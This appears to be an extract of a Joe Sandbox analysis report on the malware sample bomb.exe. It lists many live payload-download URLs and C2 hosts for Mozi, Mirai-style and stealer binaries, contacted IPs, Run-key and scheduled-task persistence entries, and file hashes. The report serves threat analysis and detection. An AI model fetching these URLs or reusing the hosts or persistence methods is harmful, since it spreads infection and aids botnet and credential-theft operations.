http://59.93.191.162:57582/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	3%, Virustotal, Browse	unknown
http://117.210.182.106:46567/Mozi.m	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	7%, Virustotal, Browse	unknown
http://42.5.82.213:60756/bin.sh	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	3%, Virustotal, Browse	unknown
http://59.91.86.216:58581/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	8%, Virustotal, Browse	unknown
http://59.92.65.160:50482/Mozi.m	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	4%, Virustotal, Browse	unknown
http://61.3.151.106:41663/bin.sh	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	7%, Virustotal, Browse	unknown
http://117.248.170.35:43845/bin.sh	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	14%, Virustotal, Browse	unknown
http://117.255.96.106:35990/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	5%, Virustotal, Browse	unknown
http://117.196.170.210:38008/Mozi.a	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	4%, Virustotal, Browse	unknown
http://94.156.66.26/i586	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	8%, Virustotal, Browse	unknown
http://117.206.74.0:38931/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	3%, Virustotal, Browse	unknown
http://59.93.227.73:55045/bin.sh	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	6%, Virustotal, Browse	unknown
http://182.119.181.181:39311/bin.sh	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	16%, Virustotal, Browse	unknown
http://222.138.19.160:33132/bin.sh	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	4%, Virustotal, Browse	unknown
http://117.245.33.109:51163/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://222.142.72.194:45127/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://117.245.47.194:57104/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://94.156.69.223/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://182.127.214.31:52275/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://59.93.29.186:44386/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://115.55.254.111:57413/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://94.156.69.223/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppc	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://123.156.8.212:57425/bin.sh	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://59.93.191.162:57582/bin.sh	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://117.213.250.246:54471/Mozi.m	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://61.3.28.212:60300/Mozi.m	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://94.156.69.223/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.i686	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://196.190.64.101:35263/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://42.59.247.79:38613/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://94.156.69.223/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arc	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://42.234.209.209:54111/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://59.88.227.15:54237/bin.sh	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://42.228.216.57:34995/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://94.156.69.223/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://1.69.40.71:59685/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://91.92.253.151/s-h.4-.ISIS	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://123.156.8.212:57425/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://222.139.69.181:37881/bin.sh	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://182.113.195.166:32901/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://222.139.69.181:37881/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://78.182.186.229:51607/Mozi.m	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://94.156.66.26/h	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://cnc.mamma.su/nullnet_bin_dir/nullnet_load.m68k	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://117.219.85.209:44270/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://123.14.156.147:40305/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://123.190.132.14:46091/bin.sh	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://59.183.6.236:39864/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://59.178.156.121:45314/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://59.89.203.155:50911/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://94.156.66.26/r	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://110.183.16.101:49471/bin.sh	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://112.242.40.23:32825/Mozi.m	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://117.248.170.114:51440/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://61.3.26.251:57047/bin.sh	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://123.9.87.73:49932/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://182.56.170.133:47770/bin.sh	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://42.239.168.96:47731/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://jask.powerforxes.shop/lopsa/66dc99a997229_VirtualLibrary.exe	bomb.exe, 00000000.00000002.2651263420.0000013431234000.00000004.00000800.00020000.00000000.sdmp, bomb.exe, 00000000.00000002.2651263420.000001342F7AE000.00000004.00000800.00020000.00000000.sdmp, bomb.exe, 00000000.00000002.2651263420.00000134317EB000.00000004.00000800.00020000.00000000.sdmp, bomb.exe, 00000000.00000002.2651263420.00000134313C0000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://115.55.244.110:40495/bin.sh	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://120.61.206.162:43790/bin.sh	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://94.156.66.39/i586	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://117.214.11.32:39055/Mozi.m	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://115.55.180.166:36621/bin.sh	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://117.221.127.174:44347/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://117.223.3.79:45392/bin.sh	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://123.9.111.1:35694/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://59.91.86.216:58581/bin.sh	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://59.89.11.47:47801/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://66.181.36.158/octopus.sh	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://115.49.92.19:58887/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://182.127.178.63:41212/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://186.90.104.124:36131/bin.sh	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
46.167.144.60	unknown	Iran (ISLAMIC Republic Of)	56402	DADEHGOSTAR-ASAS12880-DataCommunicationCompanyofIran	false
151.243.155.234	unknown	Iran (ISLAMIC Republic Of)	31549	RASANAIR	false
82.137.244.65	unknown	Syrian Arab Republic	29256	INT-PDN-STE-ASSTEPDNInternalASSY	false
213.230.124.7	unknown	Uzbekistan	8193	BRM-ASUZ	false
5.200.129.110	unknown	Iran (ISLAMIC Republic Of)	58224	TCIIR	false
217.219.240.62	unknown	Iran (ISLAMIC Republic Of)	58224	TCIIR	false
20.109.209.108	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
147.45.44.104	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	true
90.156.161.63	unknown	Russian Federation	25532	MASTERHOST-ASMoscowRussiaRU	false
198.163.194.198	unknown	United States	7029	WINDSTREAMUS	false
91.202.233.141	unknown	Russian Federation	9009	M247GB	true
90.156.162.125	unknown	Russian Federation	25532	MASTERHOST-ASMoscowRussiaRU	false
95.212.50.42	unknown	Egypt	29256	INT-PDN-STE-ASSTEPDNInternalASSY	false
5.75.49.82	unknown	Iran (ISLAMIC Republic Of)	58224	TCIIR	false
95.212.52.132	unknown	Egypt	29256	INT-PDN-STE-ASSTEPDNInternalASSY	false
62.212.36.229	unknown	Georgia	34797	SYSTEM-NETGE	false
186.169.83.212	unknown	Colombia	3816	COLOMBIATELECOMUNICACIONESSAESPCO	false
2.132.0.245	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	false
5.238.197.44	unknown	Iran (ISLAMIC Republic Of)	58224	TCIIR	false
90.156.194.162	unknown	Russian Federation	25532	MASTERHOST-ASMoscowRussiaRU	false
5.76.158.4	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	false
77.105.161.194	unknown	Russian Federation	43176	ICOMF-ASRU	false
49.12.197.9	unknown	Germany	24940	HETZNER-ASDE	false
31.171.186.111	unknown	Kazakhstan	60411	KAZINTERCOM-ASKZ	false
94.141.68.204	unknown	Uzbekistan	47452	IMAX-AS-UpstreamUztelecom-UZ	false
90.156.163.101	unknown	Russian Federation	25532	MASTERHOST-ASMoscowRussiaRU	false
89.218.218.206	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	false
176.49.230.113	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
90.156.163.98	unknown	Russian Federation	25532	MASTERHOST-ASMoscowRussiaRU	false
82.114.189.12	unknown	Yemen	30873	PTC-YEMENNETYE	false
78.106.46.188	unknown	Russian Federation	8402	CORBINA-ASOJSCVimpelcomRU	false
185.203.237.235	unknown	Russian Federation	44493	CHELYABINSK-SIGNAL-ASRU	false
141.98.233.156	unknown	Russian Federation	41011	CH-NET-ASRO	false
5.236.218.74	unknown	Iran (ISLAMIC Republic Of)	58224	TCIIR	false
203.142.81.102	unknown	Indonesia	17451	BIZNET-AS-APBIZNETNETWORKSID	false
2.132.219.162	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	false
84.240.242.246	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	false
95.142.87.201	unknown	Tajikistan	8847	TTL-ASTJ	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
188.114.97.3	unknown	European Union	13335	CLOUDFLARENETUS	false
37.48.169.183	unknown	Syrian Arab Republic	29256	INT-PDN-STE-ASSTEPDNInternalASSY	false
95.57.30.190	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	false
95.29.146.213	unknown	Russian Federation	8402	CORBINA-ASOJSCVimpelcomRU	false
104.102.49.254	unknown	United States	16625	AKAMAI-ASUS	false
92.46.100.127	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	false
198.163.196.34	unknown	United States	7029	WINDSTREAMUS	false
93.188.86.253	unknown	Russian Federation	43746	SAKH9-NETWORKRU	false
198.163.193.244	unknown	United States	7029	WINDSTREAMUS	false
185.215.113.66	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
142.250.185.78	unknown	United States	15169	GOOGLEUS	false
149.54.20.134	unknown	Afghanistan	55330	GCN-DCN-ASAFGHANTELECOMGOVERNMENTCOMMUNICATIONNETWORKA	false
189.155.102.117	unknown	Mexico	8151	UninetSAdeCVMX	false
198.163.204.127	unknown	United States	7029	WINDSTREAMUS	false
178.89.37.183	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	false
151.101.2.49	unknown	United States	54113	FASTLYUS	false
190.56.14.82	unknown	Guatemala	14754	TelguaGT	false
5.133.120.226	unknown	Russian Federation	200752	TIET-ASIT	false
213.230.99.184	unknown	Uzbekistan	8193	BRM-ASUZ	false
94.141.83.204	unknown	Uzbekistan	47452	IMAX-AS-UpstreamUztelecom-UZ	false
185.131.93.214	unknown	Iran (ISLAMIC Republic Of)	58224	TCIIR	false
2.187.45.149	unknown	Iran (ISLAMIC Republic Of)	58224	TCIIR	false
45.132.206.251	unknown	Russian Federation	59731	LIFELINK-ASRU	false
83.222.6.233	unknown	Russian Federation	25532	MASTERHOST-ASMoscowRussiaRU	false
92.47.226.20	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	false
195.158.31.142	unknown	Uzbekistan	8193	BRM-ASUZ	false
94.252.244.21	unknown	Syrian Arab Republic	29256	INT-PDN-STE-ASSTEPDNInternalASSY	false
89.43.145.211	unknown	Iran (ISLAMIC Republic Of)	58224	TCIIR	false
151.233.119.223	unknown	Iran (ISLAMIC Republic Of)	58224	TCIIR	false
5.251.248.235	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	false
213.230.127.60	unknown	Uzbekistan	8193	BRM-ASUZ	false
104.21.86.200	unknown	United States	13335	CLOUDFLARENETUS	false
216.58.212.132	unknown	United States	15169	GOOGLEUS	false
45.202.35.101	unknown	Seychelles	139086	ONL-HKOCEANNETWORKLIMITEDHK	true
20.189.173.20	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
2.177.243.253	unknown	Iran (ISLAMIC Republic Of)	12880	DCI-ASIR	false
151.232.142.97	unknown	Iran (ISLAMIC Republic Of)	58224	TCIIR	false
95.159.149.185	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
176.67.79.228	unknown	Iran (ISLAMIC Republic Of)	48944	ASKHALIJFARSONLINEIR	false
90.156.160.42	unknown	Russian Federation	25532	MASTERHOST-ASMoscowRussiaRU	false
182.50.249.15	unknown	Indonesia	45786	HTSNET-AS-IDPTHawkTeknologiSolusiID	false
91.218.161.58	unknown	Russian Federation	51346	TOJIKTELECOM-ASRU	false
113.68.89.6	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
62.209.135.143	unknown	Uzbekistan	34718	TPSUZ-ASUZ	false
89.249.62.7	unknown	Russian Federation	50164	RFTV-ASRU	false
89.43.144.91	unknown	Iran (ISLAMIC Republic Of)	58224	TCIIR	false
178.88.95.33	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	false
184.28.90.27	unknown	United States	16625	AKAMAI-ASUS	false
95.159.63.253	unknown	Syrian Arab Republic	29256	INT-PDN-STE-ASSTEPDNInternalASSY	false
88.151.180.214	unknown	Kazakhstan	41371	BIKADAKZ	false
81.214.157.48	unknown	Turkey	9121	TTNETTR	false
134.35.148.16	unknown	Yemen	30873	PTC-YEMENNETYE	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1526331
Start date and time:	2024-10-05 08:52:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 14m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	57
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	bomb.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.mine.winEXE@112/122@0/92
EGA Information:	Successful, ratio: 83.3%
HCA Information:	Successful, ratio: 97% Number of executed functions: 268 Number of non-executed functions: 161
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for powershell

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, SIHClient.exe, conhost.exe
Execution Graph export aborted for target bomb.exe, PID 6936 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Skipping network analysis since amount of network traffic is too extensive

Simulations

Behavior and APIs

Time	Type	Description
02:53:03	API Interceptor	315x Sleep call for process: bomb.exe modified
02:53:15	API Interceptor	3x Sleep call for process: svchost.exe modified
02:53:16	API Interceptor	1x Sleep call for process: http77.105.161.194file1.exe.exe modified
02:53:21	API Interceptor	1281x Sleep call for process: http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe modified
02:53:26	API Interceptor	5046x Sleep call for process: sysvplervcs.exe modified
02:53:26	API Interceptor	5102x Sleep call for process: RegSvcs.exe modified
02:53:27	API Interceptor	24x Sleep call for process: powershell.exe modified
02:53:37	API Interceptor	1x Sleep call for process: WerFault.exe modified
02:53:55	API Interceptor	11x Sleep call for process: httpjask.powerforxes.shoprevada66af9bdbf0f60_team.exe.exe modified
02:54:04	API Interceptor	134x Sleep call for process: Batch.pif modified
02:54:10	API Interceptor	1x Sleep call for process: MSBuild.exe modified
07:53:17	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Windows Settings C:\Windows\sysvplervcs.exe
07:53:26	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Settings C:\Users\user\sysvplervcs.exe
07:53:44	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Settings C:\Users\user\sysvplervcs.exe
07:55:11	Task Scheduler	Run new task: Microsoft Windows Security path: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
46.167.144.60	SecuriteInfo.com.Trojan.DownLoader46.2135.13298.13900.exe	Get hash	malicious	Phorpiex, Xmrig	Browse
82.137.244.65	SecuriteInfo.com.Trojan.DownLoader46.2135.7325.13890.exe	Get hash	malicious	Phorpiex, Xmrig	Browse
20.109.209.108	http://ctldl.windowsupdate.com/	Get hash	malicious	Unknown	Browse
147.45.44.104	file.exe	Get hash	malicious	LummaC, Vidar	Browse	jask.powerforxes.shop/ldms/a43486128347.exe
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	jask.powerforxes.shop/ldms/a43486128347.exe
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	jask.powerforxes.shop/ldms/a43486128347.exe
	d1bc91bd44a0.exe	Get hash	malicious	PrivateLoader, Stealc, Vidar	Browse	jask.powerforxes.shop/ldms/7f3c2473d1e6.exe#sp_vid
	7f3c2473d1e6.exe	Get hash	malicious	LummaC, Vidar	Browse	jask.powerforxes.shop/ldms/a43486128347.exe
	file.exe	Get hash	malicious	Vidar	Browse	playd.healthnlife.pk/ldms/a43486128347.exe
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	playd.healthnlife.pk/ldms/a43486128347.exe
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	playd.healthnlife.pk/ldms/a43486128347.exe
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	playd.healthnlife.pk/ldms/a43486128347.exe
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	playd.healthnlife.pk/ldms/a43486128347.exe

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
INT-PDN-STE-ASSTEPDNInternalASSY	file.exe	Get hash	malicious	Phorpiex	Browse	82.137.218.134
	SecuriteInfo.com.Trojan.DownLoader46.2135.11116.25434.exe	Get hash	malicious	Phorpiex	Browse	95.212.133.236
	jade.arm6.elf	Get hash	malicious	Mirai	Browse	31.14.164.21
	jade.m68k.elf	Get hash	malicious	Mirai	Browse	31.14.164.69
	jade.mpsl.elf	Get hash	malicious	Mirai	Browse	95.212.143.88
	file.exe	Get hash	malicious	Phorpiex	Browse	178.253.109.195
	file.exe	Get hash	malicious	Phorpiex	Browse	217.20.222.188
	file.exe	Get hash	malicious	Phorpiex	Browse	90.153.172.15
	SecuriteInfo.com.Trojan.DownLoader46.2135.4279.14770.exe	Get hash	malicious	Phorpiex	Browse	77.44.165.147
	sh4.elf	Get hash	malicious	Mirai, Moobot	Browse	31.9.99.83
BRM-ASUZ	file.exe	Get hash	malicious	Phorpiex	Browse	195.158.22.210
	SecuriteInfo.com.Trojan.DownLoader46.2135.11116.25434.exe	Get hash	malicious	Phorpiex	Browse	84.54.71.94
	file.exe	Get hash	malicious	Phorpiex	Browse	213.230.127.213
	file.exe	Get hash	malicious	Phorpiex	Browse	195.158.21.74
	SecuriteInfo.com.Trojan.DownLoader46.2135.4279.14770.exe	Get hash	malicious	Phorpiex	Browse	86.62.3.134
	SecuriteInfo.com.Trojan.Crypt.23519.13317.exe	Get hash	malicious	Unknown	Browse	84.54.78.48
	SecuriteInfo.com.Trojan.DownLoader46.2135.13298.13900.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	86.62.3.154
	3YHDfHLvo4.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	213.230.67.151
	SecuriteInfo.com.Trojan.DownLoader46.63386.25844.4041.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	195.158.21.74
	zisD7MC388.elf	Get hash	malicious	Mirai	Browse	213.230.117.92
DADEHGOSTAR-ASAS12880-DataCommunicationCompanyofIran	IB260MBscv.elf	Get hash	malicious	Unknown	Browse	46.224.156.99
	sora.mpsl.elf	Get hash	malicious	Mirai	Browse	46.224.107.1
	SecuriteInfo.com.Linux.Siggen.9999.22286.12230.elf	Get hash	malicious	Mirai	Browse	77.42.117.4
	SecuriteInfo.com.Trojan.DownLoader46.2135.13298.13900.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	46.167.144.60
	6RO84oS26Q.elf	Get hash	malicious	Mirai	Browse	46.225.13.206
	5dzdxe7bVc.elf	Get hash	malicious	Mirai	Browse	46.224.234.238
	vh9HOxBJJN.elf	Get hash	malicious	Mirai	Browse	46.225.224.147
	rzfcEvDxkx.elf	Get hash	malicious	Unknown	Browse	46.224.193.88
	wz5CHr5oLF.elf	Get hash	malicious	Mirai	Browse	46.225.224.160
	FE8sC55u4j.elf	Get hash	malicious	Mirai	Browse	46.224.193.39
RASANAIR	yakov.m68k.elf	Get hash	malicious	Mirai	Browse	151.238.141.123
	SecuriteInfo.com.Linux.Siggen.9999.28931.8128.elf	Get hash	malicious	Mirai	Browse	151.247.163.152
	file.exe	Get hash	malicious	Phorpiex	Browse	151.244.52.254
	SecuriteInfo.com.Trojan.DownLoader46.2135.11116.25434.exe	Get hash	malicious	Phorpiex	Browse	151.244.52.254
	jade.arm6.elf	Get hash	malicious	Mirai	Browse	31.57.182.40
	jade.arm7.elf	Get hash	malicious	Mirai	Browse	31.59.81.129
	jade.m68k.elf	Get hash	malicious	Mirai	Browse	31.58.18.174
	jade.mips.elf	Get hash	malicious	Mirai	Browse	31.58.18.152
	jade.mpsl.elf	Get hash	malicious	Mirai	Browse	94.182.90.196
	jade.spc.elf	Get hash	malicious	Mirai	Browse	31.57.182.61

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	niko.exe	Get hash	malicious	Amadey, Credential Flusher, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\BAFBFCBGHDGC\AFHDHC

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
